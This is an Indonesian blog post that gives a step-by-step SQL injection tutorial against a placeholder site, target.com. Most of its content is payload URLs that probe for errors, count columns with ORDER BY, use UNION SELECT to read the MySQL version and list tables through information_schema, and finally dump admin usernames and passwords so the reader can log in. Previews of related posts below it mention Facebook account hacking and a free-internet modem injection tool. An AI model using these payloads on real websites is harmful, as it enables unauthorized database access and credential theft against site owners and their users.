Langsung ke konten utama

Cara Hacking Website dengan teknik SQL Injection


Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.
Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com  oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.

referensi :
http://jasakom.com
http://ezine.echo.or.id

Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Cara Hack facebook lewat ID 2012

pagi gann.....!!! kali ini saya akan berposting tentang cara hack lewat id facebook ,sebelumnya mf yach bila tampilan blog ini masih brantakan,,soalnya blom ane beresin,hehehe maklum ane bru ngebuat blog lagi,soalnya yg sebelumnya udah bnyak topik yang di tampilkan jadi ane terpaksa ngebuat blog baru dengan artikel khusus yaitu tentang hacker ,wkwkwk bte nich semaleman gak bisa tidur,dari pada gak ada kerjaan mending mending nyari tutorial yang bisa di manfaatin,ane mencoba searching google kesana kemari dengan kata kuci "hacker facebook via id".setelah ber jam2 nyari,akhirnya nemu juga dan tidak sengaja ane nemu di website luar negri. ah gak usah banyak basa basi, mending langsung za ke inti pembahasannya.Ok...berikut tutorial hack facebook via id: 1. log in dulu di facebook 2. nah untuk cara yang kedua tinggal nyari facebook target 3. kalo udh ketemu tinggal liat id facebook nya,cara sebagai berikut : misalkan alamat profil korban : http://www.facebook.com/
10 komentar
Baca selengkapnya

Injek smatfreen 28 juni 2013 (internet gratis PC)

Hai sob selamat pagi,ane muncul lagi nich dengan membawa tool lagi,klo mau mnjelang subuh biasa nya ane gak bisa tidur juga,maklumlah insomnia klo kata orang hehehe maen game mulu bawaan nya bikin jenuh za klo game2 nya di ulang lagi,padahal udah tmat brapa kali,wkwk langsng ke pokok tujuan nya ya sob,untuk sekarang ane mau posting tentang  Injek smatfreen 28 juni 2013 (internet gratis PC)  klo sebelumnya ane posting yang hack modem smartfren 23 Juni,namun kebanyakan pemakai kata nya tool itu sudah tidak jalan lagi alias co.id,Tapi itu sich tergantung daerahnya masing2,klo di ane tool yg kemarin masih jalan za sob ^_^ Karena sob pastinya udah pada tau yach cara penggunaannya,maka langsung za yh di sedot (Bagi yg blom tau cara penggunaanya bisa baca di postingan sebelumnya ) Download : -Injec Smartfren tgl 28 Juni 2013 -Ultra+susu nya -Tutorial (bagi yg blom tau) Thank's For : Om Alecz XC
4 komentar
Baca selengkapnya

Berburu Direktori dan File Sensitif dengan DirBuster

Mungkin anda akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi. Direktori Sensitif Semua direktori atau file yang mengandung informasi berguna buat hacker untuk mendeface website anda, maka direktori itu termasuk sensitif. Beberapa direktori atau file yang tergolong sensitif antara lain: #>Backup Hal yang biasanya dibackup adalah database dan source script webnya. Bayangkan apa yang terjadi bila hacker berhasil mendapatkan seluruh file php dan “database dump” dalam satu file zip? Kalau anda berpikir itu tidak mungkin terjadi, anda salah besar, karena saya sering menemukan file backup berekstensi zip, tar.gz, atau sql berserakan di websitenya. #>Halaman Login
Posting Komentar
Baca selengkapnya